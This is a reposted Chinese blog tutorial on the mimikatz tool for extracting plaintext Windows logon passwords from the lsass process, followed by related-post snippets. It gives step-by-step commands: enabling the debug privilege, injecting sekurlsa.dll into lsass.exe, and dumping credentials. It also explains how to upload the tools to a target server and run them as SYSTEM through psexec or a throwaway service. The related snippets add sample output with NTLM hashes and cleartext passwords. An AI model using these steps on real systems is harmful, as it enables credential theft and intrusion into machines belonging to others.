介绍一下神器mimikatz,从lsass里抓密码

最新推荐文章于 2026-06-16 20:13:48 发布
转载 最新推荐文章于 2026-06-16 20:13:48 发布 · 3.3k 阅读 · 2
标签
#windows #dll #终端 #server #加密
#算法
mimikatz是一款能够从lsass进程中提取Windows登录密码的工具。它通过注入DLL到lsass进程来读取内存中的明文密码,支持多种Windows版本。本文介绍其使用方法及远程终端密码抓取技巧。

昨天弄了下OphCrack,一个破解windows密码的玩意,顺带想起了这个神器,mimikatz,本人首创中文译名为:咪咪卡住,不要笑,这是很严肃的名字。

咪咪卡住的下载地址:
http://blog.gentilkiwi.com/mimikatz

mimikat是一个法国人写的轻量级调试器,因为牛逼,所以成了神器。神器之所以出名了,是因为神器可以直接从 lsass.exe 里获取windows处于active状态账号明文密码,是很强大的。下面看看从我的Win7 64位上面抓密码。
进入咪咪卡住的目录,运行:

1 //开始运行神器
2 mimikatz
3 //提升权限
4 privilege::debug
5 //注入dll
6 inject::process lsass.exe sekurlsa.dll
7 //抓取密码
8 @getLogonPasswords


不管密码多么复杂都能抓出来

作者的回答的原因是,在llsass中,明文密码经过加密算法的密文 (这个加密算法是可逆的 能被解密出明文)

这个咪咪卡住啦,支持

1 Windows XP (部分可以)
2 Windows Server 2003
3 Windows Server 2008
4 Windows Vista
5 Windows 7
6 Windows 7 SP1

在远程终端(3389、mstsc.exe)、虚拟桌面中抓取密码的方法:

通常你在远程终端中运行该程序会提示:存储空间不足,无法处理此命令。

这是因为在终端模式下,不能插入远线程,跨会话不能注入,你需要使用如下方法执行该程序:

首先提取几个文件,只抓取密码的话,只需要这几个文件:

1 mimikatz_trunk\tools\PsExec.exe
2 mimikatz_trunk\Win32\mimikatz.exe
3 mimikatz_trunk\Win32\sekurlsa.dll

打包后上传至目标服务器,然后解压释放,注意路径中绝对不能有中文(可以有空格)!否则加载DLL的时候会报错:找不到文件。

然后使用以下任何一种方法即可抓取密码:

1 //最简单实用的方法,使用 PsExec.exe 启动。
2 //在系统帐户中运行 cmd.exe,或者直接运行 mimikatz.exe
3 psexec -s cmd.exe
4 //启动 mimikatz.exe
5 C:\mimikatz_trunk\Win32\mimikatz.exe
6 //提升权限
7 privilege::debug
8 //注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)!
9 inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
10 //抓取密码
11 @getLogonPasswords
12 //退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环。
13 exit
14  
15 //*********************************************************
16  
17 //使用 At 启动
18 at ***
19  
20 //*********************************************************
21  
22 //创建服务方法
23 sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt"
24 sc start getpassword
25 sc delete getpassword
26  
27 //*********************************************************
28  
29 //telnet 远程命令管道
30 telnet ****
订阅本站: http://www.nigesb.com/feed
写篇文章不容易,转载请注明来源,如果喜欢本站可以Feed订阅本站。
mimikatz_trunk
07-10
mimikat是一个法国人写的轻量级调试器,因为牛逼,所以成了神器神器之所以出名了,是因为神器可以直接从 lsass.exe 获取windows处于active状态账号明文密码,是很强大的。下面看看从我的Win7 64位上面密码
mimikatz工具
03-08
本工具可以提取存于windows电脑内存中的密码,安全无毒,最新版工具.
mimikatz_trunk(猕猴桃)
m0_73481504的博客
03-30 1483
Mimikatz是一款由法国安全研究员Benjamin Delpy(网名为gentilkiwi)开发的工具,主要用于从Windows操作系统提取加密密码和其他凭证信息。该工具最初设计用于安全测试和审计,帮助专业人员理解系统的安全状况,并发现潜在的安全漏洞。提取内存中的明文密码加密的凭证,包括NTLM和LSA散列。执行密码破解,通过暴力破解或者字典攻击获取密码。提升进程权限,模拟具有更高权限的用户行为。注入代码到其他进程中,实现远程代码执行。模拟Kerberos认证,生成假冒的服务票据。
内网渗透作业2(mimikatz、pwdump/procdump/LaZagne/nmap)
qq_45290991的博客
09-16 1383
内网渗透作业2(mimikatz、pwdump/procdump/LaZagne/nmap) 很紧张很“充实”的培训,今天主要是教了怎么取PC的密码…… 密码取5法 1.1mimikatz取明文密码 mimikatz是一个法国人写的轻量级调试器。出众之处在于其可以直接从 lsass.exe 猎取windows处于active状态账号明文密码,非常强大。 在网上找了一些相关的文章自己的一点总结吧 下载地址:https://github.com/gentilkiwi/mimikatz/rele
mimikatz使用教程
2301_78519654的博客
04-05 843
mimikatz 是一款功能强大的 Windows 平台安全工具,主要用于从内存中提取密码、哈希、票据等敏感凭据信息。它最初由法国安全研究员 Benjamin Delpy 开发,因能够直接获取明文密码而在渗透测试和安全审计领域广为人知。该工具利用 Windows 系统的安全机制缺陷,在获得管理员权限后可以访问内存中的认证信息,支持提取多种类型的凭据(如 LM/NTLM 哈希、Kerberos 票据、PIN 码等),还具备票据伪造、权限提升等高级功能,是攻防演练和系统安全评估中的重要工具。
Windows明文密码取 法国神器mimikatz_trunk附源码
浮生若梦的专栏
08-30 1万+
大家都知道的东西吧,渗透测试常用工具。尤其对社工密码收集来说必备的 法国一个牛B的人写的轻量级调试器,可以帮助安全测试人员Windows密码mimikatz 最近发布了它的2.0版本,密码命令更加简单了,估计作者也看到了对它这个神器最多的研究就是直接密码,为神马不发布一个直接一键版,哈哈哈哈哈。新功能还包括能够通过获取的kerberos登录凭据,绕过支持RestrictedAdm
内网渗透----使用mimikatz获取windows登陆口令
浅笑996的博客
12-01 2347
以管理员运行后,可以随机打一些字符,进入如下界面 输入aaa::aaa,可展示所有模块: 可采用log命令,保存日志 获取hash与明文用户口令 privilege::debug sekurlsa::logonPasswords 从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和“纯文本”密码将不在内存中生成,早期版本的Windows ...
亲测夸克“AI解题大师” ,理想中的AI家教真的要来了
数据猿
03-27 4100
在这个激烈的竞争时代,考试不再是学生的专属名词,越来越多的中年做题家们重新投入考试的激流,考取各类职业资格证书。从公开的介绍来看,夸克 “AI解题大师”颠覆了传统AI解题应用的逻辑,它以“深度思考”能力为核心,通过调用专属的学习Agent,让AI模拟高级教师的解题过程,帮助用户找到正确的学习方法、拓展思维和认知。而且更重要的是,作文所运用的词汇都是中学生级别的。家还没有 “神兽”的人也别先忙着“幸灾乐祸”,当今时代即便你想当个纯粹的牛马,如果不想被快速变化的社会所淘汰,也得像个永动机一样“干中学”。
人工智能与数学的实践
禅与计算机程序设计艺术
01-04 987
1.背景介绍 人工智能(Artificial Intelligence, AI)是一门研究如何让计算机模拟人类智能的学科。人工智能的目标是让计算机能够理解自然语言、进行逻辑推理、学习自主决策、进行视觉识别和语音识别等。人工智能的发展需要借鉴人类的智能机制,并将其转化为计算机可以理解和处理的形式。 数学是人类思维的基础,也是人工智能的基石。数学提供了一种抽象的语言,可以用来描述和解决人工智能的问...
AI软件有哪些?知道这10款就够够的了!
热门推荐
l1m0_的博客
08-11 1万+
在数字化时代,人工智能(AI)的崛起为各个领域带来了革命性的变革。越来越多的AI软件免费下载涌现,为我们的工作、创造和生活带来了新的可能性。而其中许多软件提供了免费下载,为个人和团队提供了强大的工具,彻底解放了生产力。l1m0_今天就为大家分享非常实用的10款!1.Pixso AI作为国内知名产品设计一体化协作平台,AI软件免费Pixso AI集成白板、原型、设计、交付、管理等功能,覆盖产品设计全流程。
Akagi麻将AI助手:3大核心功能教你从麻将新手到策略大师
gitblog_00020的博客
06-07 396
还在为麻将对局中的复杂决策而困惑吗?Akagi麻将AI助手是你的智能训练伙伴,通过深度AI分析帮你突破技术瓶颈。这款开源工具支持雀魂、天凤等主流平台,能够实时分析对局并提供专业建议,内置Mortal AI作为示例模型,让你在实战中快速提升麻将水平。 ## 🎯 为什么选择Akagi?三大核心优势解析 ### 1. 实时智能分析,决策不再靠运气 Akagi的核心功能是在游戏中实时显示关键数据,让
从零到量化大师:用Qlib构建你的第一个AI交易策略
最新发布
gitblog_00030的博客
06-16 386
还在为量化投资的高门槛望而却步吗?觉得机器学习模型太复杂,因子挖掘像大海捞针?今天我要告诉你一个秘密:**用Qlib,即使你是量化新手,也能在30分钟内构建出专业的AI交易策略**。这不再是华尔街精英的专利,而是每个有Python基础的程序员都能掌握的技能。 ## 为什么选择Qlib?它比你想象的更简单 想象一下,你有一个智能助手,它帮你完成了80%的量化研究工作:数据清洗、特征工程、模型训练
windows内存密码获取mimikatz_trunk
04-17
第一条:privilege::debug //提升权限 第二条:sekurlsa::logonpasswords https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20180325
mimikatz_trunk系统密码查看
01-09
mimikatz_trunk系统密码查看
mimikatz_trunk.zip
11-28
mimikataz密码取工具
神器mimikatz_trunk
01-24
32位 64位均可 不过在测试过程中 前掉至少得以ADMIN权限运行 法国黑客神器 mimikatz 直接读取管理员密码明文 通杀xp win2003 win7 win2008 WIN2000还未测试 个人感觉应该也可以 没打建环境测试 还有一篇用这个神器直接从 lsass.exe 获取windows处于active状态账号明文密码的文章 自己尝试了下用 win2008 r2 x64 来测试 总之这个神器相当华丽 还有更多能力有待各黑阔们挖掘 =..=~ mimikatz: Tool To Recover Cleartext Passwords From Lsass I meant to blog about this a while ago, but never got round to it. Here’s a brief post about very cool feature of a tool called mimikatz. I’m very grateful to the tool’s author for bringing it to my attention. Until that point, I didn’t realise it was possible to recover the cleartext passwords of logged on windows users. Something that I’m sure most pentesters would find very useful. Here’s some sample output provided by the author: mimikatz 1.0 x86 (pre-alpha) /* Traitement du Kiwi */mimikatz # privilege::debugDemande d'ACTIVATION du privilège : SeDebugPrivilege : OKmimikatz # inject::process lsass.exe sekurlsa.dllPROCESSENTRY32(lsass.exe).th32ProcessID = 488Attente de connexion du client...Serveur connecté à un client !Message du processus :Bienvenue dans un processus distant Gentil KiwiSekurLSA : librairie de manipulation des données de sécurités dans LSASSmimikatz # @getLogonPasswordsAuthentification Id : 0;434898Package d'authentification : NTLMUtilisateur principal : Gentil UserDomaine d'authentification : vm-w7-ult msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c } wdigest : password tspkg : passwordAuthentification Id : 0;269806Package d'authentification : NTLMUtilisateur principal : Gentil KiwiDomaine d'authentification : vm-w7-ult msv1_0 : lm{ d0e9aee149655a6075e4540af1f22d3b }, ntlm{ cc36cf7a8514893efccd332446158b1a } wdigest : waza1234/ tspkg : waza1234/ I wondered why the cleartext password would need to be stored in LSASS – after all every pentester will tell you that you don’t need the password to authenticate, just the hash. A bit of googling seems to indicate that wdigest (the password) is required to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password – and not just the hash. Posted in Blog
利用mimikatz_trunk获取密码明文
主人,番茄要加鸡蛋
08-01 2657
解压缩mimikatz_trunk.zip会生成3个目录,tools、Win32、x64,看机器是32还是64位操作系统,运行x64中mimikatz.exe 650) this.width=650;" border="0" alt="" src="http://img1.51cto.com/attachment/201303/114605525.jpg" /> 输入privilege::de
轻量级调试器神器 - mimikatz
Yatere的天平秤
03-08 3019
昨天有朋友发了个法国佬写的神器mimikatz 让我们看下 神器下载地址: mimikatz_trunk.zip 还有一篇用这个神器直接从 lsass.exe 获取windows处于active状态账号明文密码的文章 http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from
域渗透高权限读取本地密码
Longwaer
01-26 538
学习域环境高权限读取本地密码技术,更好的在内网环境中扩大战果。
探索Python编程的无限可能:从新手到大师
inscode_025的博客
03-03 821
最新接入DeepSeek-V3模型,点击下载最新版本InsCode AI IDE 探索Python编程的无限可能:从新手到大师 在当今数字化时代,编程技能已成为一种必备的能力。无论你是想成为一名专业的软件工程师,还是仅仅希望掌握一些编程基础来解决日常问题,Python无疑是一个极佳的选择。Python语言以其简洁易懂的语法、强大的库支持和广泛的应用领域,成为了初学者入门编程的最佳选择之一。然而,对...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值